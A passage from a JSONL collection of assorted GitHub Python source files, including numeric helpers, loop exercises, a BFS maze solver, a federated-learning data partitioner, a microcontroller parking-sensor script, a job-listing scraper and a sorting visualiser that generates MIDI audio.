.5*tf.reduce_sum(C*(X-theta))\n\n return xmh_term+binc-cosh_term\n\ndef inverse_digamma(X):\n '''\n find y such that digamma(y) = x\n\n Thomas Minka, Estimating a Dirichlet distribution,\n Technical Report 2012, Appendix C.\n\n by way of Baris Kurt\n '''\n\n M= (X>=-2.22)\n Y = tf.where(M,tf.math.exp(X)+.5,-1/(X+0.5772156649015329))\n\n for i in range(7):\n Y = Y - (tf.math.digamma(Y)-X)/tf.math.polygamma(1,Y);\n\n return Y\n","repo_name":"jacksonloper/signedfac","sub_path":"signedfac/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":5182,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"72947372993","text":"def loop1():\n # Sum the odd numbers between 1 and 20\n odd_sum = 0\n for i in range(20):\n if (i % 2) == 1:\n odd_sum += i\n return odd_sum\n\n\ndef loop2():\n # Sum the even numbers between 1 and 20\n i = 0\n even_sum = 0\n while i < 20:\n if (i % 2) == 0:\n even_sum += i\n i += 1\n return even_sum\n\nprint(loop1())\nprint(loop2())\n\n\ndef loop1Rec(num, current, sum = 0):\n \n if current == num:\n return sum\n elif (current % 2 == 1 and current != num):\n sum += current\n return loop1Rec(num, current + 1, sum)\n else: return loop1Rec(num, current + 1, sum)\n\n\nnum = 20\ncurrent = 0\nsum = 0\nprint(loop1Rec(num, current, sum))\n\n\n\ndef loop2Rec(num, current, sum = 0):\n \n if current == num:\n return sum\n elif (current % 2 == 0 and current != num):\n sum += current\n return loop2Rec(num, current + 1, sum)\n else: return loop2Rec(num, current + 1, sum)\n\n\nnum = 20\ncurrent = 0\nsum = 0\nprint(loop2Rec(num, current, sum))\n\n\n\n\n\ndef loop3Rec(num, odd_sum=0, val=0):\n val = val or 1\n if (val == num):\n return odd_sum\n elif (val % 2 == 1):\n odd_sum += val\n val+=1\n return loop3Rec(num, odd_sum, val)\n\nprint(loop3Rec(20))","repo_name":"josh-leebrowne/AFS-210","sub_path":"week2/Project1/project1.py","file_name":"project1.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16417927078","text":"import 
sys\nfrom queue import Queue\ninput = sys.stdin.readline\n\nheight, width = map(int, input().split())\ngoal_h, goal_w = height - 1, width - 1\n\n_map = []\nfor i in range(height):\n row = list(input().split('\\n')[0])\n row = list(map(int, row))\n _map.append(row)\n\ndx = [0, 0, 1, -1]\ndy = [1, -1, 0, 0]\n\nq = Queue()\nq.put((0, 0))\n_map[0][0] = 1\n\nwhile not q.empty():\n x, y = q.get()\n for i in range(4):\n nx, ny = x + dx[i], y + dy[i]\n \n # 인덱스 범위 초과\n if nx >= height or nx < 0 or ny >= width or ny < 0:\n continue\n \n # 벽\n if _map[nx][ny] == 0:\n continue\n \n # 이미 방문\n if _map[nx][ny] != 1:\n continue\n\n _map[nx][ny] = _map[x][y] + 1\n\n q.put((nx, ny))\n\nprint(_map[goal_h][goal_w])","repo_name":"Sleeeeeepy/jungle-ps","sub_path":"week2/2178.py","file_name":"2178.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10836879038","text":"import os\nfrom functools import reduce\nfrom sklearn.metrics import mean_squared_error\nimport numpy as np\n\nimport pandas as pd\nimport yaml\n\n\n\ndef file_folder_exists(path: str):\n \"\"\"\n Return True if a file or folder exists.\n :param path: the full path to be checked\n :type path: str\n \"\"\"\n try:\n os.stat(path)\n return True\n except:\n return False\n\n\ndef select_or_create(path: str):\n \"\"\"\n Check if a folder exists. If it doesn't, it create the folder.\n :param path: path to be selected\n :type path: str\n \"\"\"\n if not file_folder_exists(path):\n os.makedirs(path)\n return path\n\n\ndef merge_dataframe(data_frames):\n return reduce(lambda left, right: pd.merge(left, right, how=\"outer\"), data_frames)\n\ndef rmse(y_true, y_pred):\n return np.sqrt(mean_squared_error(y_true, y_pred))\n\n\ndef fundamental_indicators(stock):\n score = pd.DataFrame()\n score[\"code\"] = [stock.code]\n score[\"name\"] = [stock.get_info('shortName')]\n score[\"Date\"] = [stock.quot_date]\n \n score[\"Reference Price\"] = [stock.reference_price]\n score[\"Graham Price\"] = [stock.graham_price]\n\n score[\"price_over_graham_number\"] = [stock.reference_price/stock.graham_price]\n score[\"Net current asset per share over price\"] = [stock.net_current_assets_per_share/stock.reference_price]\n\n score[\"PE ratio\"] = [stock.PE]\n score[\"Return On Equity\"] = [stock.ROE]\n score[\"PB ratio\"] = [stock.PB]\n score[\"Tangible PB ratio\"] = [stock.price_to_tangible_book]\n score[\"Return on Assets\"] = [stock.ROA]\n score[\"Dividend yeld\"] = [stock.dividend_yeld]\n score[\"Payout Ratio\"] = [stock.payout_ratio]\n score[\"Quick Ratio\"] = [stock.quick_ratio]\n score[\"Price to cash flow\"] = [stock.price_to_cash_flow]\n score[\"Price to free cash flow\"] = [stock.price_to_free_cash_flow]\n score['Working capital over market cap'] = [stock.working_capital_per_share/stock.reference_price]\n score['Net cash over market cap'] = [stock.net_cash_per_share/stock.reference_price]\n score['EPS over price'] = [stock.EPS/stock.reference_price]\n score['ROCE'] = [stock.ROCE]\n score['Net income per employee'] = [stock.net_income_per_employee]\n score['Revenue per employee'] = [stock.revenue_per_employee]\n return score\n","repo_name":"AlessandroGianfelici/pyInvest","sub_path":"invest/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2067783139","text":"import random\n\nimport numpy as np\nfrom utils.logger import 
CustomLogger\n\n\nclass PartitioningScheme(object):\n\n\tdef __init__(self, x_train, y_train, partitions_num):\n\t\tself.partitions_num = partitions_num\n\t\tself.x_train = x_train\n\t\tself.y_train = y_train\n\t\tself.iid = False\n\t\tself.non_iid = False\n\t\tself.classes_per_client = 0\n\t\tself.examples_per_client = []\n\n\tdef iid_partition(self):\n\t\tidx = list(range(len(self.x_train)))\n\t\trandom.shuffle(idx)\n\t\tx_train_randomized = self.x_train[idx]\n\t\ty_train_randomized = self.y_train[idx]\n\n\t\tchunk_size = int(len(self.x_train) / self.partitions_num)\n\t\tx_chunk, y_chunk = [], []\n\t\tfor i in range(self.partitions_num):\n\t\t\tx_chunk.append(x_train_randomized[idx[i * chunk_size:(i + 1) * chunk_size]])\n\t\t\ty_chunk.append(y_train_randomized[idx[i * chunk_size:(i + 1) * chunk_size]])\n\t\tx_chunk = np.array(x_chunk)\n\t\ty_chunk = np.array(y_chunk)\n\t\tCustomLogger.info(\"Chunk size {}, {}\".format(x_chunk.shape, y_chunk.shape))\n\n\t\t# set partition object specifications\n\t\tself.iid = True\n\t\tself.classes_per_client = np.unique(y_chunk).size\n\t\tself.examples_per_client = [y_c.size for y_c in y_chunk]\n\n\t\treturn x_chunk, y_chunk\n\n\n\tdef non_iid_partition(self, classes_per_partition=2):\n\n\t\t\"\"\" If the y-data points contain numpy arrays, we need to convert it\n\t\tto a list of values in order for the set/hash to take effect during\n\t\tpartitioning by the y-axis. \"\"\"\n\t\ty_are_ndarrays = False\n\t\tif isinstance(self.y_train[0], np.ndarray):\n\t\t\ty_are_ndarrays = True\n\t\t\ty_converted_values = []\n\t\t\tfor v in self.y_train:\n\t\t\t\ty_converted_values.extend(v.tolist())\n\t\telse:\n\t\t\ty_converted_values = self.y_train\n\n\t\tsorted_data = sorted(zip(self.x_train, y_converted_values), key=lambda pair: pair[1])\n\t\tx_train_sorted = [x for x, y in sorted_data]\n\t\ty_train_sorted = [y for x, y in sorted_data]\n\n\t\t# The number of chunks depends on the number of partitions and number of classes.\n\t\t# If we want one class per client then we split the data into #partitions == #clients\n\t\t# else, if we want k-classes per client then we need to split the data into #partitions * #k-classes\n\t\tchunk_size = int(len(self.x_train) / (self.partitions_num * classes_per_partition))\n\n\t\tx_chunks = [x_train_sorted[i:i+chunk_size] for i in range(0, len(x_train_sorted), chunk_size)]\n\t\ty_chunks = [y_train_sorted[i:i+chunk_size] for i in range(0, len(y_train_sorted), chunk_size)]\n\n\t\tx_chunks_all_clients, y_chunks_all_clients = [], []\n\t\tassigned_chunks = dict()\n\t\tfor pidx in range(self.partitions_num):\n\t\t\tassigned_classes = 0\n\t\t\tindexes_to_remove = []\n\t\t\tx_chunks_single_client, y_chunks_single_client = [], []\n\t\t\tfor chunk_idx, y_chunk in enumerate(y_chunks):\n\t\t\t\tif assigned_classes < classes_per_partition:\n\t\t\t\t\t# Make sure that there is no overlap between classes.\n\t\t\t\t\tif len(set(y_chunks_single_client).intersection(set(y_chunk))) == 0:\n\t\t\t\t\t\ty_chunks_single_client.extend(y_chunk)\n\t\t\t\t\t\tx_chunks_single_client.extend(x_chunks[chunk_idx])\n\t\t\t\t\t\tassigned_chunks[chunk_idx] = True\n\t\t\t\t\t\tassigned_classes += 1\n\t\t\t\t\t\tindexes_to_remove.append(chunk_idx)\n\t\t\t\telse:\n\t\t\t\t\t# If limit of assigned classes is reached then exit.\n\t\t\t\t\tbreak\n\t\t\tx_chunks_all_clients.append(x_chunks_single_client)\n\t\t\ty_chunks_all_clients.append(y_chunks_single_client)\n\n\t\t\tfor position, idx in enumerate(indexes_to_remove):\n\t\t\t\tdel x_chunks[idx-position]\n\t\t\t\tdel 
y_chunks[idx-position]\n\n\t\tx_chunk = np.array(x_chunks_all_clients)\n\n\t\t\"\"\" Bring the format of the y-values back to their original numpy array format. \"\"\"\n\t\tif y_are_ndarrays:\n\t\t\tfor idx, y_chunk in enumerate(y_chunks_all_clients):\n\t\t\t\ty_chunks_all_clients[idx] = [np.array(y) for y in y_chunk]\n\n\t\ty_chunk = np.array(y_chunks_all_clients)\n\t\tCustomLogger.info(\"Chunk size {}. X-attribute shape: {}, Y-attribute shape: {}\".format(\n\t\t\tchunk_size, x_chunk.shape, y_chunk.shape))\n\t\tremaining = len(y_chunks)\n\t\tCustomLogger.info(\"Remaining unassigned data points: {}\".format(len(y_chunks)))\n\t\tif remaining > 0:\n\t\t\traise RuntimeError(\"Not all training data have been assigned.\")\n\n\t\t# set partition object specifications\n\t\tself.non_iid = True\n\t\tself.classes_per_client = classes_per_partition\n\t\tself.examples_per_client = [y_c.size for y_c in y_chunk]\n\n\t\treturn x_chunk, y_chunk\n\n\n\tdef dirichlet_based_partition(self, a):\n\t\tpass\n\n\n\tdef to_json_representation(self):\n\t\treturn {'iid': self.iid,\n\t\t\t\t'non_iid': self.non_iid,\n\t\t\t\t'classes_per_client': self.classes_per_client,\n\t\t\t\t'examples_per_client': self.examples_per_client}\n","repo_name":"dstripelis/FedSparsify","sub_path":"utils/data_distribution.py","file_name":"data_distribution.py","file_ext":"py","file_size_in_byte":4436,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"23577873171","text":"\r\n\r\ndef bestSpeed(horses,D):\r\n minSpeed=10**20\r\n for h in horses:\r\n if h[0] bool:\n goal = len(nums) - 1\n for i in range(len(nums) - 1, -1, -1):\n if nums[i] + i >= goal:\n goal = i\n return goal == 0","repo_name":"victordacamino/LeetHub","sub_path":"0055-jump-game/0055-jump-game.py","file_name":"0055-jump-game.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74752667715","text":"import time\nimport board\nimport adafruit_hcsr04\nimport digitalio\nimport pulseio\nimport sys\n\n# This is the State Machine class that will be inherited from the main one\nclass SM:\n def start(self):\n self.state = self.startState\n def step(self, inp):\n (s, o) = self.getNextValues(self.state, inp)\n self.state = s\n return o\n def transduce(self, inputs):\n self.start()\n return [self.step(inp) for inp in inputs]\n\n# This is the class where we built our own class inheriting State Machine class\nclass ParkAssistant(SM):\n state = \"\"\n def __init__(self):\n # defining each item that belongs to our class\n self.timer = 0 # local variable as counter\n self.greenLED = digitalio.DigitalInOut(board.D10) # Green LED\n self.redLED = digitalio.DigitalInOut(board.D11) # Red LED\n self.yellowLED = digitalio.DigitalInOut(board.D12) # Yellow LED\n # Opening Ceremony\n for led in [self.greenLED, self.yellowLED, self.redLED]:\n led.direction = digitalio.Direction.OUTPUT\n led.value = True\n time.sleep(2)\n led.value = False\n time.sleep(1)\n self.buzzer = pulseio.PWMOut(board.D13, variable_frequency=True) # Buffer initiated\n # Buffer attributes - Start\n self.buzzer.frequency = 440\n self.OFF = 0\n self.ON = 2 ** 15\n # Buffer attributes - End\n self.buzzer.duty_cycle = self.ON # Turn on the buzzer\n time.sleep(1)\n self.buzzer.duty_cycle = self.OFF # Turn off the buzzer\n self.sonar = adafruit_hcsr04.HCSR04(trigger_pin=board.D4, echo_pin=board.D2) # Sensor placement on board\n\n print(\"Obstacle Detector Device is 
Working\")\n\n def getNextValues(self, state, inp):\n self.inp = inp\n self.state = state #\n self.turnOffLEDs() # Turning off the LEDs\n # Conditions are made here to warn the driver\n if inp > 120 and inp < 200:\n self.greenLED.value = True\n return \"You are Safe\", inp\n elif inp > 50 and inp <= 120:\n self.yellowLED.value = True\n return \"Slow Down Your Speed\", inp \n elif inp > 25 and inp <= 50:\n self.redLED.value = True\n return \"DANGER TOO CLOSE\", inp\n elif inp >= 200:\n self.greenLED.value = True\n self.yellowLED.value = True\n return 'Distance Error', inp\n elif inp <= 25:\n self.redLED.value = True\n self.buzzer.duty_cycle = self.ON\n self.timer += 1\n if self.timer >= 5:\n self.shutdown()\n return \"Warning!\", inp\n \n # This function is made to turn off LEDs at a moment\n def turnOffLEDs(self):\n self.redLED.value = False\n self.greenLED.value = False\n self.yellowLED.value = False\n\n # This function is made to check \n def VolumeControl(self):\n \"\"\" You can open commants to obtain dynamic frequency changing \"\"\"\n \n# if self.state == \"You are Safe\" or self.inp >= 120:\n# self.buzzer.duty_cycle = self.OFF\n# return\n\n# if self.state != \"Warning!\":\n# self.timer = 0\n \n# self.buzzer.duty_cycle = self.ON\n# frequency = 440-self.inp*4\n# if frequency <= 0: frequency = 1\n# self.buzzer.frequency = frequency\n if self.state != \"Warning!\": \n self.buzzer.duty_cycle = self.OFF\n self.timer = 0\n\n # This is the function that starts the whole application\n def startParking(self):\n while True:\n try:\n print(\"{}: {}\".format(self.step(int(self.sonar.distance)), self.state))\n self.VolumeControl()\n except RuntimeError:\n print('Distance Error')\n time.sleep(0.5)\n # This is the function that will stop the whole system at a moment.\n def shutdown(self):\n print(\"The Device Stopped! 
Calling the emergency services\")\n sys.exit()\n\nparkAssistant = ParkAssistant() # Forming the instance\nparkAssistant.startParking() # Starting the application\n","repo_name":"alperdokay/EECS-201-Final-Project","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":4166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7769940160","text":"text = {\n 'China' : ['中国','No.1'],\n 'America' : ['美国','No.2'],\n 'Japan' : ['日本','No.3'],\n 'India' : ['印度','No.4']\n}\n\n'''\n\n#这三种要用for去遍历\n\nprint((text.keys())) #打印键名(带字典名)\n\nprint((text.values())) #打印键值(带字典名)\n\nprint((text.items())) #打印元素(带字典名)\n\n'''\n\n\n'''\n\nfor i in text.keys(): #打印键名\n print(i)\n\nfor i in text.values(): #打印键值\n print(i)\n\nfor i in text.items(): #打印元素\n print(i)\n\n'''","repo_name":"AmanoRenard/Python","sub_path":"学习/字典.py","file_name":"字典.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72330806915","text":"import requests\nfrom bs4 import BeautifulSoup\n\nfrom main_module.sites.Jobs import Jobs\n\ninit_url = \"https://www.linkedin.com/jobs/search/?&location=Worldwide&sortBy=DD\"\n\n\nclass Linkedin(Jobs):\n def __init__(self, url=init_url, item_count=30, page_item_number=24):\n self.page_item_number = page_item_number\n super().__init__(url, item_count, page_item_number)\n\n def get_page_result(self):\n page_results = []\n for page in self.rang:\n try:\n response = requests.get(\n self.url + f\"&start={page * self.page_item_number}\" if page != 1 else self.url,\n headers={\n \"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0\",\n \"Host\": \"www.linkedin.com\",\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\",\n \"Accept-Language\": \"en-US,en;q=0.5\",\n \"Accept-Encoding\": \"gzip, deflate, br\",\n \"Connection\": \"keep-alive\",\n \"Upgrade-Insecure-Requests\": \"1\"\n }\n )\n except requests.exceptions.RequestException as e: # This is the correct syntax\n raise self.RequestException(e)\n soup = BeautifulSoup(response.content, \"html.parser\")\n result = (\n soup.findAll(\"div\", attrs={\n \"class\": \"base-card\"})\n [:self.last_page_item]\n if len(self.rang) == page\n else soup.findAll(\"div\", class_=\"base-card\")\n )\n page_results.append(result)\n return page_results\n\n def get_job_results(self, page_results):\n for page in page_results:\n for item in page[::-1]:\n link_element = item.find(\"a\", class_=\"c-jobListView__titleLink\")\n link = link_element.get(\"href\")\n title = link_element.text.strip()\n time = item.find(\"span\", class_=\"c-jobListView__passedDays\")\n image = item.find(\"img\", class_=\"o-listView__itemIndicatorImage\")\n match = re.search(self.image_regex, image[\"src\"])\n image_link = None\n if match:\n image_link = match.group()\n date = self.generate_item_date(time)\n self.job_results.append({\n \"title\": title,\n \"published_at\": date,\n \"image\": image_link,\n \"link\": link\n })\n","repo_name":"amirdks/web_scraping_project","sub_path":"main_module/sites/linkedin.py","file_name":"linkedin.py","file_ext":"py","file_size_in_byte":2630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29379718851","text":"# For `anyconfig.open`:\n# pylint: disable=redefined-builtin\nr\"\"\"\n.. 
module:: anyconfig\n :platform: Unix, Windows\n :synopsis: Generic interface to loaders for various config file formats.\n\npython-anyconfig is a `MIT licensed `_\npython library provides common APIs to access to configuration files in various\nformats with some useful features such as contents merge, templates and schema\nvalidation/generation support.\n\n- Home: https://github.com/ssato/python-anyconfig\n- (Latest) Doc: http://python-anyconfig.readthedocs.org/en/latest/\n- PyPI: https://pypi.python.org/pypi/anyconfig\n- Copr RPM repos: https://copr.fedoraproject.org/coprs/ssato/python-anyconfig/\n\n\"\"\"\nfrom .globals import AUTHOR, VERSION\nfrom .api import (\n single_load, multi_load, load, loads, dump, dumps, validate, gen_schema,\n list_types, find_loader, merge, get, set_, open,\n MS_REPLACE, MS_NO_REPLACE, MS_DICTS, MS_DICTS_AND_LISTS,\n UnknownParserTypeError, UnknownFileTypeError\n)\n\n__author__ = AUTHOR\n__version__ = VERSION\n\n__all__ = [\n \"single_load\", \"multi_load\", \"load\", \"loads\", \"dump\", \"dumps\", \"validate\",\n \"gen_schema\", \"list_types\", \"find_loader\", \"merge\",\n \"get\", \"set_\", \"open\",\n \"MS_REPLACE\", \"MS_NO_REPLACE\", \"MS_DICTS\", \"MS_DICTS_AND_LISTS\",\n \"UnknownParserTypeError\", \"UnknownFileTypeError\"\n]\n\n# vim:sw=4:ts=4:et:\n","repo_name":"amitvashist7/ansible-development-CTS","sub_path":"molecule/my_env/lib/python2.7/site-packages/anyconfig/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1367,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"22946748003","text":"\nfrom vsg import token\n\nfrom vsg.rules import move_token_left_to_next_non_whitespace_token as Rule\n\nlTokens = []\nlTokens.append(token.concurrent_selected_signal_assignment.select_keyword)\nlTokens.append(token.selected_force_assignment.select_keyword)\nlTokens.append(token.selected_variable_assignment.select_keyword)\nlTokens.append(token.selected_waveform_assignment.select_keyword)\n\n\nclass rule_002(Rule):\n '''\n This rule checks the **select** keyword is on the same line as the expression.\n\n **Violation**\n\n .. code-block:: vhdl\n\n with mux_sel\n select addr <=\n \"0000\" when 0,\n \"0001\" when 1,\n \"1111\" when others;\n\n **Fix**\n\n .. 
code-block:: vhdl\n\n with mux_sel select addr <=\n \"0000\" when 0,\n \"0001\" when 1,\n \"1111\" when others;\n '''\n\n def __init__(self):\n Rule.__init__(self, 'selected_assignment', '002', lTokens)\n","repo_name":"jeremiah-c-leary/vhdl-style-guide","sub_path":"vsg/rules/selected_assignment/rule_002.py","file_name":"rule_002.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":150,"dataset":"github-code","pt":"61"} +{"seq_id":"34924863393","text":"import math\nimport sys\n\nmoons = []\nfor l in sys.stdin:\n moons.append([int(e.split('=')[1]) for e in l.strip()[1:-1].split(',')])\n\ndef sim(pos, steps):\n vel = [[0, 0, 0] for _ in range(len(pos))]\n\n for _ in range(steps):\n for p, v in zip(pos, vel):\n for o in pos:\n for i in range(len(p)):\n if p[i] > o[i]:\n v[i] -= 1\n elif p[i] < o[i]:\n v[i] += 1\n\n for p, v in zip(pos, vel):\n for i in range(len(p)):\n p[i] += v[i]\n\n return pos, vel\n\npos, vel = sim([m[:] for m in moons], 1000)\nprint(sum([sum([abs(v) for v in p]) * sum([abs(v) for v in vel[i]]) for i, p in enumerate(pos)]))\n\ncycles = []\nfor i in range(3):\n c = 0\n initial_pos = [p[i] for p in moons]\n initial_vel= [0 for _ in range(len(pos))]\n pos = [m[i] for m in moons]\n vel = initial_vel[:]\n\n while True:\n for j in range(len(pos)):\n for o in pos:\n if pos[j] > o:\n vel[j] -= 1\n elif pos[j] < o:\n vel[j] += 1\n\n for j in range(len(pos)):\n pos[j] += vel[j]\n\n c += 1\n if pos == initial_pos and vel == initial_vel:\n break\n cycles.append(c)\n\nprint(math.lcm(*cycles))\n","repo_name":"xilefsensei/adventofcode","sub_path":"19/12.py","file_name":"12.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"23140115900","text":"from copy import deepcopy\nimport itertools as it\nimport math\nfrom random import randint\nimport subprocess\nfrom typing import Tuple\n\nimport matplotlib.pyplot as plt\nfrom matplotlib.animation import FuncAnimation\nimport mido\nimport numpy as np\nfrom tqdm import tqdm\n\nfrom env import Env\nfrom env.events import *\n\nDEFAULT_BPM = 120\nDEFAULT_TICKS_PER_BEAT = 480\nTIMIDITY = 'timidity.exe'\n\n\ndef generate_audio(env: Env, bpm=DEFAULT_BPM, ticks_per_beat=DEFAULT_TICKS_PER_BEAT, filename='audio.wav'):\n\tenv = deepcopy(env)\n\ttempo = mido.bpm2tempo(bpm)\n\n\tblocks = env.mem.blocks\n\tevents = env.events\n\t[e.revert() for e in events[::-1]]\n\n\tmid = mido.MidiFile(ticks_per_beat=ticks_per_beat)\n\ttrack = mid.add_track()\n\n\ttrack.append(mido.MetaMessage('set_tempo', tempo=tempo))\n\n\tINSTRUMENTS = [randint(0, 127) for _ in range(len(blocks))]\n\tprint('INSTRUMENTS:', INSTRUMENTS)\n\tblock2ch = {b: 2*i for i, b in enumerate(blocks)}\n\tfor ch, ins in zip(block2ch.values(), INSTRUMENTS):\n\t\ttrack.append(mido.Message('program_change', channel=ch, program=ins))\n\t\ttrack.append(mido.Message('control_change', channel=ch, control=10, value=0))\n\t\ttrack.append(mido.Message('program_change', channel=ch+1, program=ins))\n\t\ttrack.append(mido.Message('control_change', channel=ch+1, control=10, value=127))\n\ttrack.append(mido.Message('sysex', data=[], time=events[0].time))\n\n\tOCTAVE_NOTES = [1,0,1,0,1,1,0,1,0,1,0,1] # major scale 'ttsttts'\n\tnote_map = [i for i, x in enumerate(it.islice(it.cycle(OCTAVE_NOTES), 128)) if x and 20 < i < 109]\n\n\tdef to_note(addr: Addr, mode: str) -> Tuple[int, int]:\n\t\tch = block2ch[addr.block]\n\t\tif mode == 'w':\n\t\t\tch += 1\n\t\telif mode != 
'r':\n\t\t\traise Exception\n\n\t\treturn ch, note_map[addr.offset + (len(note_map) - len(addr)) // 2]\n\n\tfor i, ev in enumerate(events):\n\t\tif isinstance(ev, EventCmp):\n\t\t\tops = [(ev.addr1, 'r'), (ev.addr2, 'r')]\n\t\telif isinstance(ev, EventSwap):\n\t\t\tops = [(ev.addr1, 'w'), (ev.addr2, 'w')]\n\t\telif isinstance(ev, EventMov):\n\t\t\tops = [(ev.dst, 'w'), (ev.src, 'r')]\n\t\telif isinstance(ev, EventEnd):\n\t\t\tbreak\n\t\telse:\n\t\t\traise Exception\n\n\t\tfor addr, mode in ops:\n\t\t\tch, note = to_note(addr, mode)\n\t\t\ttrack.append(mido.Message('note_on', channel=ch, note=note))\n\t\ttrack.append(mido.Message('sysex', data=[], time=events[i+1].time - ev.time))\n\t\tfor addr, mode in ops:\n\t\t\tch, note = to_note(addr, mode)\n\t\t\ttrack.append(mido.Message('note_off', channel=ch, note=note))\n\n\tmidi_outfile = filename.rsplit('.', maxsplit=1)[0] + '.mid'\n\tmid.save(midi_outfile)\n\n\tsubprocess.run([\n\t\tTIMIDITY,\n\t\t'--preserve-silence',\n\t\t'-c', 'timidity_config.cfg',\n\t\t'--voice-lpf=d',\n\t\tmidi_outfile,\n\t\t'-OwS',\n\t\t'-o', filename\n\t])\n\ndef generate_animation(env: Env, start_delay, title='', bpm=DEFAULT_BPM, ticks_per_beat=DEFAULT_TICKS_PER_BEAT, filename='anim.mp4', figsize=(12.80,7.20)):\n\tCOLOR_IDLE = 'white'\n\tCOLORS_CMP = ['limegreen'] * 2\n\tCOLORS_SWAP = ['red'] * 2\n\tCOLORS_MOV = ['red', 'limegreen']\n\tFPS = 30\n\tTIMEWINDOW = 2\n\n\tenv = deepcopy(env)\n\ttempo = mido.bpm2tempo(bpm)\n\n\tblocks = env.mem.blocks\n\tevents = env.events\n\t[e.revert() for e in events[::-1]]\n\n\tplt.style.use('dark_background')\n\tfig, (arr_axs, midi_axs) = plt.subplots(2, len(blocks), sharey='row', sharex='col', squeeze=False,\n\t gridspec_kw={\n\t\t 'width_ratios': [len(b) for b in blocks],\n\t\t 'wspace': 0,\n\t\t 'height_ratios': [1, 2],\n\t\t 'hspace': 0\n\t }, figsize=figsize)\n\tfor ax in it.chain(arr_axs, midi_axs):\n\t\tax.tick_params(which='both',\n\t\t bottom=False, top=False, left=False, right=False,\n\t\t labelbottom=False, labeltop=False, labelleft=False, labelright=False)\n\tfig.tight_layout(rect=[0,0,1,0.95])\n\tbars = {block: ax.bar(range(len(block)), block, width=1, color=COLOR_IDLE, edgecolor='black')\n\t for ax, block in zip(arr_axs, blocks)}\n\n\t# Generate note bars\n\tfor ax, block in zip(midi_axs, blocks):\n\t\tax.set_ylim(-start_delay + TIMEWINDOW, start_delay)\n\n\t\txs = []\n\t\theights = []\n\t\tbottoms = []\n\t\tcolors = []\n\n\t\tfor i, ev in enumerate(events):\n\t\t\tif isinstance(ev, EventEnd):\n\t\t\t\tcontinue\n\n\t\t\tev2 = events[i+1]\n\t\t\theight = mido.tick2second(ev2.time - ev.time, ticks_per_beat, tempo)\n\t\t\tbottom = mido.tick2second(ev.time, ticks_per_beat, tempo)\n\t\t\tif isinstance(ev, EventCmp):\n\t\t\t\taddr = [ev.addr1, ev.addr2]\n\t\t\t\tcolor = COLORS_CMP\n\t\t\telif isinstance(ev, EventSwap):\n\t\t\t\taddr = [ev.addr1, ev.addr2]\n\t\t\t\tcolor = COLORS_SWAP\n\t\t\telif isinstance(ev, EventMov):\n\t\t\t\taddr = [ev.dst, ev.src]\n\t\t\t\tcolor = COLORS_MOV\n\t\t\telse:\n\t\t\t\traise ValueError\n\n\t\t\tfor j in range(len(addr)):\n\t\t\t\ta = addr[j]\n\t\t\t\tif a.block is block:\n\t\t\t\t\txs.append(a.offset)\n\t\t\t\t\theights.append(height)\n\t\t\t\t\tbottoms.append(bottom)\n\t\t\t\t\tcolors.append(color[j])\n\n\t\tax.bar(xs, heights, width=1, bottom=bottoms, color=colors, edgecolor='black')\n\n\n\tcmps = swaps = movs = total = 0\n\tdef title_fmt():\n\t\treturn f'{title}\\nSize:{len(env.arr)} -- Cmps:{cmps} -- Swaps:{swaps} -- Movs:{movs} -- Total:{total}'\n\n\tend_time_s = 
mido.tick2second(events[-1].time, ticks_per_beat, tempo)\n\ttotal_frames = math.ceil((end_time_s + start_delay) * 30)\n\tframe_times = np.linspace(-start_delay, end_time_s, total_frames)\n\tpbar = tqdm(total=total_frames)\n\n\tprev_bars = []\n\trevents = events[::-1]\n\n\tdef init():\n\t\tfig.suptitle(title_fmt())\n\t\treturn []\n\n\tdef update(t):\n\t\tnonlocal prev_bars, cmps, swaps, movs, total\n\n\t\tpbar.update()\n\n\t\tfig.suptitle(title_fmt())\n\n\t\tfor ax in midi_axs:\n\t\t\tax.set_ylim(t + TIMEWINDOW, t)\n\n\t\tret = []\n\t\tif t >= mido.tick2second(revents[-1].time, ticks_per_beat, tempo):\n\t\t\tevent = revents.pop()\n\n\t\t\tfor bar in prev_bars:\n\t\t\t\tbar.set_facecolor(COLOR_IDLE)\n\t\t\t\tret.append(bar)\n\t\t\tprev_bars = []\n\n\t\t\tevent.apply()\n\n\t\t\tif isinstance(event, EventCmp):\n\t\t\t\tcmps += 1\n\t\t\t\tcolors = COLORS_CMP\n\t\t\t\taddrs = [event.addr1, event.addr2]\n\t\t\telif isinstance(event, EventSwap):\n\t\t\t\tswaps += 1\n\t\t\t\tcolors = COLORS_SWAP\n\t\t\t\taddrs = [event.addr1, event.addr2]\n\t\t\telif isinstance(event, EventMov):\n\t\t\t\tmovs += 1\n\t\t\t\tcolors = COLORS_MOV\n\t\t\t\taddrs = [event.dst, event.src]\n\t\t\telif isinstance(event, EventEnd):\n\t\t\t\treturn 